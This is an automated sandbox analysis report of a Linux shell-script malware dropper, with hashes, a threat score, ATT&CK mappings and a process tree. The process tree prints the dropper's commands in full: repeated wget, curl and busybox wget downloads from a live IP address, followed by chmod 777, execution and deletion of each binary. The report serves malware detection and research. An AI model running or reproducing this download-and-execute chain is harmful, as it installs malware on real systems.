9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2

Analysis

max time kernel
25s
max time network
66s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
21-11-2024 07:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh
Size

10KB
MD5

a1defdb85efc4f43f3026f633f9d8642
SHA1

50c5a077d2f6661aae89e985d3ed38d1c6678db1
SHA256

9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2
SHA512

ccce629290ff01417dcfcaa9313b1d4fe996f2d0131a5e211a0d9b41c81883bc0aced8f92fce2e96cc8216fcd2be2d5c1703f77c54706880e444a2bbe868b459
SSDEEP

192:hhYH7jooSYSyovzbEXvHC+OU1RZEEhWsRH7jooECSyovzkXvHC+V1RZEEs:Pp1tOo

Score

7^/10

antivm defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid process

817 chmod
835 chmod
684 chmod
699 chmod
723 chmod
748 chmod
780 chmod
829 chmod
758 chmod
797 chmod
803 chmod
810 chmod
823 chmod

pid	process
817	chmod
835	chmod
684	chmod
699	chmod
723	chmod
748	chmod
780	chmod
829	chmod
758	chmod
797	chmod
803	chmod
810	chmod
823	chmod

Executes dropped EXE 13 IoCs

Processes:

tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoee8NickSVHHGc0CKiNoIeQQeLHFwsfykCoztEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9NeEfuuLaOesxwARQirEHUr8hwbo6uUPtCmWoUgB7802yL8EGGk7pLs8LQPIEsBTddncmWwnZK2byWknzW1gXWixRxIyczawUsL7rR9c8zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZUqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdOJXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ7xcf066zx6JjlSH0geP2dCyq8I4938BMoGxlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a

ioc	pid	process
/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0	685	tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
/tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe	700	cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
/tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz	725	e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
/tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne	749	tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
/tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo	760	EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
/tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw	782	UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
/tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8	798	nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
/tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ	804	zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
/tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO	811	UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
/tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ	818	JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
/tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG	824	7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
/tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc	830	xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
/tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a	836	0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a

Checks CPU configuration 1 TTPs 13 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 26 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

Writes file to tmp directory 13 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for modification	/tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a	curl
File opened for modification	/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0	curl
File opened for modification	/tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe	curl
File opened for modification	/tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo	curl
File opened for modification	/tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw	curl
File opened for modification	/tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ	curl
File opened for modification	/tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ	curl
File opened for modification	/tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc	curl
File opened for modification	/tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz	curl
File opened for modification	/tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne	curl
File opened for modification	/tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8	curl
File opened for modification	/tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO	curl
File opened for modification	/tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG	curl

/tmp/9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh
/tmp/9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh
1⤵
PID:652
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:654
- /usr/bin/wget
  wget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  PID:660
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:675
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  PID:682
- /bin/chmod
  chmod 777 tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  - File and Directory Permissions Modification
  PID:684
- /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  ./tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  - Executes dropped EXE
  PID:685
- /bin/rm
  rm tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  PID:686
- /usr/bin/wget
  wget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  PID:687
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:690
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  PID:693
- /bin/chmod
  chmod 777 cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  - File and Directory Permissions Modification
  PID:699
- /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  ./cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  - Executes dropped EXE
  PID:700
- /bin/rm
  rm cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  PID:702
- /usr/bin/wget
  wget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  PID:703
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:710
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  PID:717
- /bin/chmod
  chmod 777 e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  - File and Directory Permissions Modification
  PID:723
- /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  ./e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  - Executes dropped EXE
  PID:725
- /bin/rm
  rm e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  PID:726
- /usr/bin/wget
  wget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  PID:727
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:734
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  PID:743
- /bin/chmod
  chmod 777 tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  - File and Directory Permissions Modification
  PID:748
- /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  ./tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  - Executes dropped EXE
  PID:749
- /bin/rm
  rm tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  PID:750
- /usr/bin/wget
  wget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  PID:751
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:753
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  PID:754
- /bin/chmod
  chmod 777 EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  - File and Directory Permissions Modification
  PID:758
- /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  ./EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  - Executes dropped EXE
  PID:760
- /bin/rm
  rm EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  PID:761
- /usr/bin/wget
  wget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  PID:762
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:768
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  PID:775
- /bin/chmod
  chmod 777 UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  - File and Directory Permissions Modification
  PID:780
- /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  ./UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  - Executes dropped EXE
  PID:782
- /bin/rm
  rm UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  PID:784
- /usr/bin/wget
  wget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  PID:785
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:792
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  PID:796
- /bin/chmod
  chmod 777 nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  - File and Directory Permissions Modification
  PID:797
- /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  ./nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  - Executes dropped EXE
  PID:798
- /bin/rm
  rm nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  PID:799
- /usr/bin/wget
  wget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  PID:800
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:801
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  PID:802
- /bin/chmod
  chmod 777 zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  - File and Directory Permissions Modification
  PID:803
- /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  ./zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  - Executes dropped EXE
  PID:804
- /bin/rm
  rm zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  PID:805
- /usr/bin/wget
  wget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  PID:806
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:807
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  PID:808
- /bin/chmod
  chmod 777 UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  - File and Directory Permissions Modification
  PID:810
- /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  ./UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  - Executes dropped EXE
  PID:811
- /bin/rm
  rm UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  PID:812
- /usr/bin/wget
  wget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  PID:813
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:815
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  PID:816
- /bin/chmod
  chmod 777 JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  - File and Directory Permissions Modification
  PID:817
- /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  ./JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  - Executes dropped EXE
  PID:818
- /bin/rm
  rm JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  PID:819
- /usr/bin/wget
  wget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  PID:820
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:821
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  PID:822
- /bin/chmod
  chmod 777 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  - File and Directory Permissions Modification
  PID:823
- /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  ./7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  - Executes dropped EXE
  PID:824
- /bin/rm
  rm 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  PID:825
- /usr/bin/wget
  wget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  PID:826
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:827
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  PID:828
- /bin/chmod
  chmod 777 xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  - File and Directory Permissions Modification
  PID:829
- /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  ./xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  - Executes dropped EXE
  PID:830
- /bin/rm
  rm xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  PID:831
- /usr/bin/wget
  wget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  PID:832
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:833
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  PID:834
- /bin/chmod
  chmod 777 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  - File and Directory Permissions Modification
  PID:835
- /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  ./0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  - Executes dropped EXE
  PID:836
- /bin/rm
  rm 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  PID:837
- /usr/bin/wget
  wget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  2⤵
  PID:838

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit
memory/727-1-0xb670c000-0xb671d044-memory.dmp

Download
memory/820-2-0xb6740000-0xb6751044-memory.dmp

Download